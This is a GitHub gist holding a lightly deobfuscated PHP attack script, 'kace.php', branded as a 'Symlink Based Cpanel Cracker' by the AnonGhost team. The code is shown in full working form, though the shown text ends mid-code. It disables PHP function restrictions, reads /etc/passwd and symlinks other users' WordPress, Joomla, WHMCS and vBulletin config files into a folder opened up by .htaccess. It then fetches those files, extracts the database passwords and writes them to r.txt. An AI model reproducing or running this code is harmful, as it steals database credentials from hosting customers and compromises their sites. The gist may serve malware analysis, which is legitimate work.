Skip to content

Instantly share code, notes, and snippets.

@tclancy

tclancy/kace.php

Created May 16, 2014 13:16
Show Gist options
  • Save tclancy/26a795ace92df57c8d34 to your computer and use it in GitHub Desktop.
Save tclancy/26a795ace92df57c8d34 to your computer and use it in GitHub Desktop.
Download ZIP
Deobfuscated Wordpress hacking script (kace.php)
Raw
kace.php
<?php
$ {
"GLOBALS"
}
["urgtxxu"]="password";
$ {
"GLOBALS"
}
["tmwmkkbdjy"]="data";
$ {
"GLOBALS"
}
["trhahkqrevw"]="connect_timeout";
$ {
"GLOBALS"
}
["onsdfdthx"]="finalpass";
$ {
"GLOBALS"
}
["qkfpdhf"]="target";
$ {
"GLOBALS"
}
["wqykbxlcrzw"]="finaluser";
$ {
"GLOBALS"
}
["iasgvgve"]="passlist";
$ {
"GLOBALS"
}
["afrrfxkgbv"]="userl";
$ {
"GLOBALS"
}
["cywofo"]="userlist";
$ {
"GLOBALS"
}
["ainkhzdg"]="timeout";
$ {
"GLOBALS"
}
["cmlkxbh"]="cracked";
$ {
"GLOBALS"
}
["jtxbycj"]="attack";
$ {
"GLOBALS"
}
["avvdiennau"]="passl";
$ {
"GLOBALS"
}
["pkxusn"]="rt";
$ {
"GLOBALS"
}
["mpzmgvjrk"]="pf";
$ {
"GLOBALS"
}
["frnguil"]="d";
$ {
"GLOBALS"
}
["oqvsusmuih"]="users";
$ {
"GLOBALS"
}
["nheadbdqjtu"]="db";
$ {
"GLOBALS"
}
["jqbdqptiz"]="pass";
$ {
"GLOBALS"
}
["dseeueq"]="dbp";
$ {
"GLOBALS"
}
["smposrbewu"]="uxl";
$ {
"GLOBALS"
}
["ytygxi"]="result";
$ {
"GLOBALS"
}
["clcexgoc"]="ch";
$ {
"GLOBALS"
}
["ghpkiod"]="co";
$ {
"GLOBALS"
}
["tfufwtkggg"]="usersss";
$ {
"GLOBALS"
}
["xqjsjx"]="ffile";
$ {
"GLOBALS"
}
["pmtirjsjc"]="ar1";
$ {
"GLOBALS"
}
["kerydmcjzyb"]="ar";
$ {
"GLOBALS"
}
["jlqnbkqdiu"]="marqueurFinLien";
$ {
"GLOBALS"
}
["ggmdrvtscl"]="ar0";
$ {
"GLOBALS"
}
["cphxtevrvxlx"]="uss";
$ {
"GLOBALS"
}
["nfkxmppan"]="us";
$ {
"GLOBALS"
}
["fdrsjdqvvfa"]="usr";
$ {
"GLOBALS"
}
["wwtfekdukc"]="f";
$ {
"GLOBALS"
}
["mppsifb"]="user";
$ {
"GLOBALS"
}
["tnsglnuwozs"]="str";
$ {
"GLOBALS"
}
["estpmxtrsymy"]="link";
$ {
"GLOBALS"
}
["ukikdh"]="r";
$pfsmvyqq="head";
$ {
"GLOBALS"
}
["puhmppjk"]="head";
$ {
$ {
"GLOBALS"
}
["puhmppjk"]
}
="
<html>
<head>
</script>
<title>--==[[Symlink Based Cpanel Cracker By Team AnonGhost Team]]==--</title>
<link rel=\"shortcut icon\" href=\"http://i.imgur.com/g7VNhrD.gif\" />
<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">
<STYLE>
body {
font-family: Tahoma
}
tr {
BORDER: dashed 1px #333;
color: #FFF;
}
td {
BORDER: dashed 1px #333;
color: #FFF;
}
.table1 {
BORDER: 0px Black;
BACKGROUND-COLOR: Black;
color: #FFF;
}
.td1 {
BORDER: 0px;
BORDER-COLOR: #333333;
font: 7pt Verdana;
color: Green;
}
.tr1 {
BORDER: 0px;
BORDER-COLOR: #333333;
color: #FFF;
}
table {
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
BACKGROUND-COLOR: Black;
color: #FFF;
}
input {
border : solid 3px ;
border-color : #333;
BACKGROUND-COLOR: white;
font: 11pt Verdana;
color: #333;
}
select {
BORDER-RIGHT: Black 1px solid;
BORDER-TOP: #DF0000 1px solid;
BORDER-LEFT: #DF0000 1px solid;
BORDER-BOTTOM: Black 1px solid;
BORDER-color: #FFF;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: Red;
}
submit {
BORDER: buttonhighlight 2px outset;
BACKGROUND-COLOR: Black;
width: 30%;
color: #FFF;
}
textarea {
border : dashed 1px #333;
BACKGROUND-COLOR: Black;
font: Fixedsys bold;
color: #999;
}
BODY {
SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
margin: 1px;
color: Red;
background-color: Black;
}
.main {
margin : -287px 0px 0px -490px;
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
}
.tt {
background-color: Black;
}
A:link {
COLOR: White; TEXT-DECORATION: none
}
A:visited {
COLOR: White; TEXT-DECORATION: none
}
A:hover {
color: Red; TEXT-DECORATION: none
}
A:active {
color: Red; TEXT-DECORATION: none
}
</STYLE>
<script language='javascript'>
function hide_div(id)
{
document.getElementById(id).style.display = 'none';
document.cookie=id+'=0;';
}
function show_div(id)
{
document.getElementById(id).style.display = 'block';
document.cookie=id+'=1;';
}
function change_divst(id)
{
if (document.getElementById(id).style.display == 'none')
show_div(id);
else
hide_div(id);
}
</script>";
echo "<html>
<head>
";
echo$ {
$pfsmvyqq
}
;
echo"
<table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" class=\"tb1\" >
<td width=\"100%\" align=center valign=\"top\" rowspan=\"1\">
<font color=\"#00FFFF\" size=5 face=\"comic sans ms\"><b>--==[[ Symlink Based</font><font color=\"#00FFFF\" size=5 face=\"comic sans ms\"><b> cPanel Cracker By</font><font color=\"#00FFFF\" size=5 face=\"comic sans ms\"><b> AnonGhost Team ]]==--</font> <div class=\"hedr\">
<td height=\"10\" align=\"left\" class=\"td1\"></td></tr><tr><td
width=\"100%\" align=\"center\" valign=\"top\" rowspan=\"1\"><font
color=\"red\" face=\"comic sans ms\"size=\"1\"><b>
<font color=#ff0000>
####################################################</font><font color=#ff0>#####################################################</font><font color=#00ff00>####################################################</font><br><img src=\"http://sphotos-f.ak.fbcdn.net/hphotos-ak-ash3/521783_103710146495379_821757957_n.jpg\"/><br><font color=red>
####################################################</font><font color=yellow>#####################################################</font><font color=lime>####################################################</font>
</table>
</table>
<table width=\"100%\" border=\"2\">
<tr>
<td width=\"10%\" align=\"center\">
<blink><font color=\"red\"><code>Greetz To : </code></font></blink>
</td>
<td width=\"90%\">
<font color=\"lime\">
<marquee><code>Cutira Rahayu (Mygirlfriend) | AnonGhost | INDISHELL | ZHC | Mauritania Hacker Team | Algerian To The Core | GCE College ke DON | Local Root INDISHELL | DON3 | All Member AnonGhost | All Member INDISHELL | All Member Algerian To The Core</code></marquee>
</font>
</td>
</tr>
</table>
<br></font></div><div align=center><table width=50%><font color=\"#FF0000\" font size=5>r3c0d3d by : <a href=\"http://www.facebook.com/K4C3.undetected2\"/><font color=\"#00ff00\" font size=5>K4C3 Undetected<a/></font></table>
";
echo "<body bgcolor=black><h3 style=\"text-align:center\"><font color=red size=2 face=\"comic sans ms\">
<form method=post>
<input type=submit name=ini value=\"Generate PHP.ini\" /></form>
";
if(isset($_POST["ini"])) {
$tuyukblaw="rr";
$ {
"GLOBALS"
}
["vpmwuoumuy"]="rr";
$zcbtdlw="r";
$ {
$zcbtdlw
}
=fopen("php.ini","w");
$ {
"GLOBALS"
}
["bkdfntbucf"]="link";
$ {
$tuyukblaw
}
=" disable_functions=none ";
fwrite($ {
$ {
"GLOBALS"
}
["ukikdh"]
}
,$ {
$ {
"GLOBALS"
}
["vpmwuoumuy"]
}
);
$ {
$ {
"GLOBALS"
}
["bkdfntbucf"]
}
="<a href=php.ini><font color=white size=2 face=\"comic sans ms\"><u>open this link in new tab to run PHP.INI</u></font></a>";
echo$ {
$ {
"GLOBALS"
}
["estpmxtrsymy"]
}
;
}
$ {
"GLOBALS"
}
["fhuebeob"]="userl";
echo "<p>\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ Symlink based cpanel cracking ///////////////////////
";
echo "<form method=post>
<input type=submit name=\"usre\" value=\"click to Extract usernames and mass symlink\" /></form>
";
if(isset($_POST["usre"])) {
$ {
"GLOBALS"
}
["nmgxpcpfqbz"]="users";
$ {
"GLOBALS"
}
["ooteonyawj"]="users";
$ulpomnmkws="user";
echo "<form method=post>
<textarea rows=10 cols=30 name=user>";
$ {
$ {
"GLOBALS"
}
["ooteonyawj"]
}
=file("/etc/passwd");
foreach($ {
$ {
"GLOBALS"
}
["nmgxpcpfqbz"]
}
as$ {
$ulpomnmkws
}
) {
$ {
$ {
"GLOBALS"
}
["tnsglnuwozs"]
}
=explode(":",$ {
$ {
"GLOBALS"
}
["mppsifb"]
}
);
$ {
"GLOBALS"
}
["withojrurut"]="str";
echo$ {
$ {
"GLOBALS"
}
["withojrurut"]
}
[0]."
";
}
echo "</textarea><br><br>
<input type=submit name=su value=\"Kill Them\" /></form>
";
}
error_reporting(0);
echo"<font color=red size=2 face=\"comic sans ms\">";
if(isset($_POST["su"])) {
$tpllhfwoe="r";
$ {
"GLOBALS"
}
["lyvnzejugsvu"]="uss";
$tcorpxovnr="dir";
$ {
"GLOBALS"
}
["kveejcvk"]="f";
$ {
"GLOBALS"
}
["rueiegknmuns"]="consym";
$ {
$tcorpxovnr
}
=mkdir("kace",0777);
$ {
$tpllhfwoe
}
=" Options all
DirectoryIndex kace.html
Require None
Satisfy Any";
$ {
$ {
"GLOBALS"
}
["wwtfekdukc"]
}
=fopen("kace/.htaccess","w");
fwrite($ {
$ {
"GLOBALS"
}
["kveejcvk"]
}
,$ {
$ {
"GLOBALS"
}
["ukikdh"]
}
);
$ {
$ {
"GLOBALS"
}
["rueiegknmuns"]
}
="<a href=kace/><font color=white size=3 face=\"comic sans ms\">configuration files</font></a>";
echo"<br>folder where config files has been symlinked<br><u><font color=red size=2 face=\"comic sans ms\">$consym</font></u>";
$ {
$ {
"GLOBALS"
}
["fdrsjdqvvfa"]
}
=explode("
",$_POST["user"]);
foreach($ {
$ {
"GLOBALS"
}
["fdrsjdqvvfa"]
}
as$ {
$ {
"GLOBALS"
}
["lyvnzejugsvu"]
}
) {
$ {
"GLOBALS"
}
["ykxuxbudxwd"]="us";
$nnfijewaq="us";
$ {
$ {
"GLOBALS"
}
["nfkxmppan"]
}
=trim($ {
$ {
"GLOBALS"
}
["cphxtevrvxlx"]
}
);
$ {
"GLOBALS"
}
["hqkbkbp"]="r";
$ {
"GLOBALS"
}
["tjipdfjxt"]="us";
$digicnsr="r";
$ilinfsl="us";
$nttomrctg="r";
$wtsjldlfks="r";
$ {
$wtsjldlfks
}
="kace/";
$ {
"GLOBALS"
}
["siqthtb"]="us";
$emvqckjm="us";
symlink("/home/".$ {
$ {
"GLOBALS"
}
["nfkxmppan"]
}
."/public_html/wp-config.php",$ {
$ {
"GLOBALS"
}
["ukikdh"]
}
.$ {
$ {
"GLOBALS"
}
["nfkxmppan"]
}
."..wp-config");
$vbdqstdn="us";
symlink("/home/".$ {
$ {
"GLOBALS"
}
["nfkxmppan"]
}
."/public_html/wordpress/wp-config.php",$ {
$ {
"GLOBALS"
}
["ukikdh"]
}
.$ {
$ {
"GLOBALS"
}
["nfkxmppan"]
}
."..word-wp");
$ {
"GLOBALS"
}
["oeqavelcrca"]="us";
$ {
"GLOBALS"
}
["evgapi"]="r";
$fuepnu="us";
$ {
"GLOBALS"
}
["ciedzzvonvs"]="us";
$ywjdhaoepls="r";
$ {
"GLOBALS"
}
["seuqbf"]="us";
$ {
"GLOBALS"
}
["icatsvxz"]="us";
$jgueznl="r";
$bxhsmqekesfp="us";
$osqubeuk="us";
$yhskzomzcmj="us";
$ {
"GLOBALS"
}
["iqlxhlploe"]="r";
$qshqeltig="us";
symlink("/home/".$ {
$ {
"GLOBALS"
}
["seuqbf"]
}
."/public_html/blog/wp-config.php",$ {
$ {
"GLOBALS"
}
["ukikdh"]
}
.$ {
$ {
"GLOBALS"
}
["nfkxmppan"]
}
."..wpblog");
$ynyawmsbu="r";
$upygzgud="r";
symlink("/home/".$ {
$vbdqstdn
}
."/public_html/configuration.php",$ {
$ {
"GLOBALS"
}
["iqlxhlploe"]
}
.$ {
$ {
"GLOBALS"
}
["nfkxmppan"]
}
."..joomla-or-whmcs");
symlink("/home/".$ {
$ {
"GLOBALS"
}
["nfkxmppan"]
}
."/public_html/joomla/configuration.php",$ {
$ {
"GLOBALS"
}
["evgapi"]
}
.$ {
$ {
"GLOBALS"
}
["siqthtb"]
}
."..joomla");
$xmytnoqtu="us";
$ {
"GLOBALS"
}
["fphgbuds"]="us";
$ {
"GLOBALS"
}
["psapxabo"]="us";
$ {
"GLOBALS"
}
["fmwcjqjyryn"]="us";
$ {
"GLOBALS"
}
["uhxnnsjox"]="us";
$ {
"GLOBALS"
}
["vtrdskbnl"]="r";
symlink("/home/".$ {
$ {
"GLOBALS"
}
["nfkxmppan"]
}
."/public_html/vb/includes/config.php",$ {
$nttomrctg
}
.$ {
$ {
"GLOBALS"
}
["nfkxmppan"]
}
."..vbinc");
symlink("/home/".$ {
$ {
"GLOBALS"
}
["uhxnnsjox"]
}
."/public_html/includes/config.php",$ {
$ {
"GLOBALS"
}
["ukikdh"]
}
.$ {
$ {
"GLOBALS"
}
["nfkxmppan"]
}
."..vb");
$ {
"GLOBALS"
}
["wnvbzxp"]="us";
$ {
"GLOBALS"
}
["hqilsywq"]="r";
symlink("/home/".$ {
$ {
"GLOBALS"
}
["nfkxmppan"]
}
."/public_html/conf_global.php",$ {
$ {
"GLOBALS"
}
["ukikdh"]
}
.$ {
$ {
"GLOBALS"
}
["nfkxmppan"]
}
."..conf_global");
symlink("/home/".$ {
$qshqeltig
}
."/public_html/inc/config.php",$ {
$ {
"GLOBALS"
}
["ukikdh"]
}
.$ {
$ {
"GLOBALS"
}
["tjipdfjxt"]
}
."..inc");
symlink("/home/".$ {
$ {
"GLOBALS"
}
["fphgbuds"]
}
."/public_html/config.php",$ {
$ {
"GLOBALS"
}
["ukikdh"]
}
.$ {
$xmytnoqtu
}
."..config");
symlink("/home/".$ {
$ {
"GLOBALS"
}
["nfkxmppan"]
}
."/public_html/Settings.php",$ {
$ywjdhaoepls
}
.$ {
$ {
"GLOBALS"
}
["nfkxmppan"]
}
."..Settings");
symlink("/home/".$ {
$ {
"GLOBALS"
}
["oeqavelcrca"]
}
."/public_html/sites/default/settings.php",$ {
$digicnsr
}
.$ {
$ {
"GLOBALS"
}
["wnvbzxp"]
}
."..sites");
symlink("/home/".$ {
$ilinfsl
}
."/public_html/whm/configuration.php",$ {
$ {
"GLOBALS"
}
["ukikdh"]
}
.$ {
$emvqckjm
}
."..whm");
$qqfekrji="us";
$ {
"GLOBALS"
}
["twjpjgbpqc"]="r";
$ {
"GLOBALS"
}
["sxqkxmmdzq"]="us";
symlink("/home/".$ {
$ {
"GLOBALS"
}
["nfkxmppan"]
}
."/public_html/whmcs/configuration.php",$ {
$ {
"GLOBALS"
}
["ukikdh"]
}
.$ {
$osqubeuk
}
."..whmcs");
$cbuolpszvmwl="us";
$ {
"GLOBALS"
}
["qgnhbmkjk"]="us";
symlink("/home/".$ {
$cbuolpszvmwl
}
."/public_html/support/configuration.php",$ {
$ {
"GLOBALS"
}
["ukikdh"]
}
.$ {
$ {
"GLOBALS"
}
["nfkxmppan"]
}
."..supporwhmcs");
symlink("/home/".$ {
$ {
"GLOBALS"
}
["sxqkxmmdzq"]
}
."/public_html/whmc/WHM/configuration.php",$ {
$ {
"GLOBALS"
}
["ukikdh"]
}
.$ {
$ {
"GLOBALS"
}
["nfkxmppan"]
}
."..WHM");
symlink("/home/".$ {
$ {
"GLOBALS"
}
["nfkxmppan"]
}
."/public_html/whm/WHMCS/configuration.php",$ {
$ {
"GLOBALS"
}
["twjpjgbpqc"]
}
.$ {
$ {
"GLOBALS"
}
["fmwcjqjyryn"]
}
."..whmc");
symlink("/home/".$ {
$fuepnu
}
."/public_html/whm/whmcs/configuration.php",$ {
$ {
"GLOBALS"
}
["vtrdskbnl"]
}
.$ {
$ {
"GLOBALS"
}
["ciedzzvonvs"]
}
."..WHMcs");
symlink("/home/".$ {
$ {
"GLOBALS"
}
["nfkxmppan"]
}
."/public_html/support/configuration.php",$ {
$jgueznl
}
.$ {
$ {
"GLOBALS"
}
["nfkxmppan"]
}
."..whmcsupp");
symlink("/home/".$ {
$qqfekrji
}
."/public_html/clients/configuration.php",$ {
$ {
"GLOBALS"
}
["ukikdh"]
}
.$ {
$ {
"GLOBALS"
}
["nfkxmppan"]
}
."..whmcs-cli");
symlink("/home/".$ {
$ {
"GLOBALS"
}
["ykxuxbudxwd"]
}
."/public_html/client/configuration.php",$ {
$ {
"GLOBALS"
}
["hqkbkbp"]
}
.$ {
$ {
"GLOBALS"
}
["icatsvxz"]
}
."..whmcs-cl");
symlink("/home/".$ {
$ {
"GLOBALS"
}
["nfkxmppan"]
}
."/public_html/clientes/configuration.php",$ {
$ynyawmsbu
}
.$ {
$bxhsmqekesfp
}
."..whmcs-CL");
symlink("/home/".$ {
$ {
"GLOBALS"
}
["psapxabo"]
}
."/public_html/cliente/configuration.php",$ {
$ {
"GLOBALS"
}
["ukikdh"]
}
.$ {
$ {
"GLOBALS"
}
["nfkxmppan"]
}
."..whmcs-Cl");
symlink("/home/".$ {
$nnfijewaq
}
."/public_html/clientsupport/configuration.php",$ {
$ {
"GLOBALS"
}
["hqilsywq"]
}
.$ {
$ {
"GLOBALS"
}
["nfkxmppan"]
}
."..whmcs-csup");
symlink("/home/".$ {
$yhskzomzcmj
}
."/public_html/billing/configuration.php",$ {
$upygzgud
}
.$ {
$ {
"GLOBALS"
}
["qgnhbmkjk"]
}
."..whmcs-bill");
symlink("/home/".$ {
$ {
"GLOBALS"
}
["nfkxmppan"]
}
."/public_html/admin/config.php",$ {
$ {
"GLOBALS"
}
["ukikdh"]
}
.$ {
$ {
"GLOBALS"
}
["nfkxmppan"]
}
."..admin-conf");
}
}
echo "
<form method=post>
<input type=submit name=sm value=\"start grabbing passwords from configuration files\"></form>
";
$ {
"GLOBALS"
}
["ytidfmauvywq"]="target";
error_reporting(0);
set_time_limit(0);
function entre2v2($text,$marqueurDebutLien,$marqueurFinLien) {
$olntrvw="text";
$khrhbgxcul="ar";
$ {
"GLOBALS"
}
["agilmrcy"]="ar1";
$ {
"GLOBALS"
}
["dbdhjgpvvl"]="marqueurDebutLien";
$ {
$ {
"GLOBALS"
}
["ggmdrvtscl"]
}
=explode($ {
$ {
"GLOBALS"
}
["dbdhjgpvvl"]
}
,$ {
$olntrvw
}
);
$ {
$ {
"GLOBALS"
}
["agilmrcy"]
}
=explode($ {
$ {
"GLOBALS"
}
["jlqnbkqdiu"]
}
,$ {
$ {
"GLOBALS"
}
["ggmdrvtscl"]
}
[1]);
$ {
$ {
"GLOBALS"
}
["kerydmcjzyb"]
}
=trim($ {
$ {
"GLOBALS"
}
["pmtirjsjc"]
}
[0]);
return$ {
$khrhbgxcul
}
;
}
if(isset($_POST["sm"])) {
echo"U can see the the Passowrd in here :p";
$ {
"GLOBALS"
}
["svhyqvbhq"]="r";
$ {
$ {
"GLOBALS"
}
["xqjsjx"]
}
=fopen("r.txt","a+");
$ {
"GLOBALS"
}
["nhifbiqs"]="user";
$ {
"GLOBALS"
}
["ztuunpxyevyv"]="re";
$ {
$ {
"GLOBALS"
}
["svhyqvbhq"]
}
="http://".$_SERVER["SERVER_NAME"].dirname($_SERVER["SCRIPT_NAME"])."/kace/";
$nsznhpufgc="confi";
$ {
$ {
"GLOBALS"
}
["ztuunpxyevyv"]
}
=$ {
$ {
"GLOBALS"
}
["ukikdh"]
}
;
$oqjgrkmwi="users";
$ {
"GLOBALS"
}
["hrwgcxni"]="users";
$ {
$nsznhpufgc
}
=array("..wp-config","..word-wp","..wpblog","..config","..admin-conf","..vb","..joomla-or-whmcs","..joomla","..vbinc","..whm","..whmcs","..supporwhmcs","..WHM","..whmc","..WHMcs","..whmcsupp","..whmcs-cli","..whmcs-cl","..whmcs-CL","..whmcs-Cl","..whmcs-csup","..whmcs-bill");
$ {
$ {
"GLOBALS"
}
["hrwgcxni"]
}
=file("/etc/passwd");
foreach($ {
$oqjgrkmwi
}
as$ {
$ {
"GLOBALS"
}
["nhifbiqs"]
}
) {
$ {
"GLOBALS"
}
["lffiivehuw"]="str";
$ {
"GLOBALS"
}
["fdwmnihfmm"]="str";
$qdscoy="confi";
$ {
"GLOBALS"
}
["qdsgggmv"]="user";
$ {
$ {
"GLOBALS"
}
["fdwmnihfmm"]
}
=explode(":",$ {
$ {
"GLOBALS"
}
["qdsgggmv"]
}
);
$ {
$ {
"GLOBALS"
}
["tfufwtkggg"]
}
=$ {
$ {
"GLOBALS"
}
["lffiivehuw"]
}
[0];
foreach($ {
$qdscoy
}
as$ {
$ {
"GLOBALS"
}
["ghpkiod"]
}
) {
$lqovtogmdro="ch";
$pohpfdtmti="re";
$ {
"GLOBALS"
}
["nchjukvvqit"]="ch";
$hehrkezdpk="uxl";
$ {
"GLOBALS"
}
["pemxmrsh"]="uurl";
$ptrckqlsicw="uxl";
$wzhjhoquw="uel";
$nmkswatkkt="co";
$ghknfyflg="uurl";
$ {
"GLOBALS"
}
["vxtiswnt"]="uel";
$fmcdexbf="ch";
$oebhbtqi="uxl";
$nkpoepwpdqd="result";
$mbpipeu="uxl";
$ {
$ghknfyflg
}
=$ {
$pohpfdtmti
}
.$ {
$ {
"GLOBALS"
}
["tfufwtkggg"]
}
.$ {
$nmkswatkkt
}
;
$anhgzfy="ch";
$ {
$ {
"GLOBALS"
}
["vxtiswnt"]
}
=$ {
$ {
"GLOBALS"
}
["pemxmrsh"]
}
;
$ {
$ {
"GLOBALS"
}
["clcexgoc"]
}
=curl_init();
$ {
"GLOBALS"
}
["wppiyrcdbbn"]="ch";
$kgbbmpotw="uxl";
curl_setopt($ {
$ {
"GLOBALS"
}
["clcexgoc"]
}
,CURLOPT_URL,$ {
$wzhjhoquw
}
);
curl_setopt($ {
$ {
"GLOBALS"
}
["nchjukvvqit"]
}
,CURLOPT_HEADER,1);
curl_setopt($ {
$anhgzfy
}
,CURLOPT_RETURNTRANSFER,1);
$gqfsexakg="ch";
curl_setopt($ {
$gqfsexakg
}
,CURLOPT_CONNECTTIMEOUT,5);
$wgmhnq="uxl";
$ {
"GLOBALS"
}
["jpvfshlwt"]="uxl";
$cpyvvnpbpbc="uxl";
curl_setopt($ {
$ {
"GLOBALS"
}
["wppiyrcdbbn"]
}
,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8");
$ {
$ {
"GLOBALS"
}
["ytygxi"]
}
["EXE"]=curl_exec($ {
$fmcdexbf
}
);
curl_close($ {
$lqovtogmdro
}
);
$ {
$ {
"GLOBALS"
}
["smposrbewu"]
}
=$ {
$nkpoepwpdqd
}
["EXE"];
$dsojfl="uxl";
$ {
"GLOBALS"
}
["glpswt"]="uxl";
if($ {
$kgbbmpotw
}
&&preg_match("/table_prefix/i",$ {
$ptrckqlsicw
}
)) {
$xoynetliybs="ffile";
$ {
"GLOBALS"
}
["mbbohos"]="pass";
$ {
"GLOBALS"
}
["jkoqdoylpm"]="dbp";
echo"<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's website cms is wordpress </font></td></tr></table>";
echo$ {
$ {
"GLOBALS"
}
["dseeueq"]
}
=entre2v2($ {
$ {
"GLOBALS"
}
["smposrbewu"]
}
,"DB_PASSWORD', '","');");
if(!empty($ {
$ {
"GLOBALS"
}
["dseeueq"]
}
))$ {
$ {
"GLOBALS"
}
["mbbohos"]
}
=$ {
$ {
"GLOBALS"
}
["jkoqdoylpm"]
}
."
";
fwrite($ {
$xoynetliybs
}
,$ {
$ {
"GLOBALS"
}
["jqbdqptiz"]
}
);
} elseif($ {
$ {
"GLOBALS"
}
["smposrbewu"]
}
&&preg_match("/cc_encryption_hash/i",$ {
$ {
"GLOBALS"
}
["smposrbewu"]
}
)) {
$ {
"GLOBALS"
}
["kmisenk"]="ffile";
$ {
"GLOBALS"
}
["vjmxfhywxr"]="uxl";
echo"<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's website whmcs bhaiyu xD </font></td></tr></table>";
$ {
"GLOBALS"
}
["weynhgik"]="pass";
$ukdseoc="pass";
$ {
"GLOBALS"
}
["htwkxy"]="dbp";
echo$ {
$ {
"GLOBALS"
}
["dseeueq"]
}
=entre2v2($ {
$ {
"GLOBALS"
}
["vjmxfhywxr"]
}
,"db_password = '","';");
if(!empty($ {
$ {
"GLOBALS"
}
["htwkxy"]
}
))$ {
$ukdseoc
}
=$ {
$ {
"GLOBALS"
}
["dseeueq"]
}
."
";
fwrite($ {
$ {
"GLOBALS"
}
["kmisenk"]
}
,$ {
$ {
"GLOBALS"
}
["weynhgik"]
}
);
} elseif($ {
$ {
"GLOBALS"
}
["smposrbewu"]
}
&&preg_match("/dbprefix/i",$ {
$dsojfl
}
)) {
echo"<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's website cms is joomla </font></td></tr></table>";
echo$ {
$ {
"GLOBALS"
}
["nheadbdqjtu"]
}
=entre2v2($ {
$ {
"GLOBALS"
}
["smposrbewu"]
}
,"password = '","';");
if(!empty($ {
$ {
"GLOBALS"
}
["nheadbdqjtu"]
}
))$ {
$ {
"GLOBALS"
}
["jqbdqptiz"]
}
=$ {
$ {
"GLOBALS"
}
["nheadbdqjtu"]
}
."
";
fwrite($ {
$ {
"GLOBALS"
}
["xqjsjx"]
}
,$ {
$ {
"GLOBALS"
}
["jqbdqptiz"]
}
);
} elseif($ {
$hehrkezdpk
}
&&preg_match("/admincpdir/i",$ {
$ {
"GLOBALS"
}
["glpswt"]
}
)) {
$ {
"GLOBALS"
}
["htwdbdmj"]="ffile";
$gjyjauxxdfpq="db";
echo"<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's website cms is vbulletin </font></td></tr></table>";
$ {
"GLOBALS"
}
["wripkprnh"]="uxl";
echo$ {
$gjyjauxxdfpq
}
=entre2v2($ {
$ {
"GLOBALS"
}
["wripkprnh"]
}
,"password'] = '","';");
if(!empty($ {
$ {
"GLOBALS"
}
["nheadbdqjtu"]
}
))$ {
$ {
"GLOBALS"
}
["jqbdqptiz"]
}
=$ {
$ {
"GLOBALS"
}
["nheadbdqjtu"]
}
."
";
fwrite($ {
$ {
"GLOBALS"
}
["htwdbdmj"]
}
,$ {
$ {
"GLOBALS"
}
["jqbdqptiz"]
}
);
} elseif($ {
$oebhbtqi
}
&&preg_match("/DB_DATABASE/i",$ {
$ {
"GLOBALS"
}
["smposrbewu"]
}
)) {
$hlhjxgxol="db";
$ {
"GLOBALS"
}
["osbyycmsfkxm"]="db";
$ {
"GLOBALS"
}
["rdvmodv"]="pass";
$ {
"GLOBALS"
}
["ssvsiovd"]="db";
$quoeboygi="pass";
echo"<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> got config file for unknwon cms for user $usersss </font></td></tr></table>";
echo$ {
$ {
"GLOBALS"
}
["ssvsiovd"]
}
=entre2v2($ {
$ {
"GLOBALS"
}
["smposrbewu"]
}
,"DB_PASSWORD', '","');");
if(!empty($ {
$hlhjxgxol
}
))$ {
$quoeboygi
}
=$ {
$ {
"GLOBALS"
}
["osbyycmsfkxm"]
}
."
";
fwrite($ {
$ {
"GLOBALS"
}
["xqjsjx"]
}
,$ {
$ {
"GLOBALS"
}
["rdvmodv"]
}
);
} elseif($ {
$wgmhnq
}
&&preg_match("/dbpass/i",$ {
$ {
"GLOBALS"
}
["jpvfshlwt"]
}
)) {
$gbelrygh="pass";
$ {
"GLOBALS"
}
["krskycqvw"]="db";
echo"<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's config file for unknwon cms </font></td></tr></table>";
$dnoptjeza="db";
echo$ {
$ {
"GLOBALS"
}
["krskycqvw"]
}
=entre2v2($ {
$ {
"GLOBALS"
}
["smposrbewu"]
}
,"dbpass = '","';");
if(!empty($ {
$ {
"GLOBALS"
}
["nheadbdqjtu"]
}
))$ {
$gbelrygh
}
=$ {
$dnoptjeza
}
."
";
fwrite($ {
$ {
"GLOBALS"
}
["xqjsjx"]
}
,$ {
$ {
"GLOBALS"
}
["jqbdqptiz"]
}
);
} elseif($ {
$ {
"GLOBALS"
}
["smposrbewu"]
}
&&preg_match("/dbpass/i",$ {
$ {
"GLOBALS"
}
["smposrbewu"]
}
)) {
$ {
"GLOBALS"
}
["tsvcdhbxjjcy"]="db";
$uamjgbemxfm="pass";
$vhwdotel="uxl";
echo"<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> got config file for unknwon cms of user $usersss </font></td></tr></table>";
echo$ {
$ {
"GLOBALS"
}
["tsvcdhbxjjcy"]
}
=entre2v2($ {
$vhwdotel
}
,"dbpass = '","';");
$ {
"GLOBALS"
}
["jzcldxweqx"]="db";
if(!empty($ {
$ {
"GLOBALS"
}
["jzcldxweqx"]
}
))$ {
$uamjgbemxfm
}
=$ {
$ {
"GLOBALS"
}
["nheadbdqjtu"]
}
."
";
fwrite($ {
$ {
"GLOBALS"
}
["xqjsjx"]
}
,$ {
$ {
"GLOBALS"
}
["jqbdqptiz"]
}
);
} elseif($ {
$cpyvvnpbpbc
}
&&preg_match("/dbpass/i",$ {
$mbpipeu
}
)) {
$ynqhaxyy="uxl";
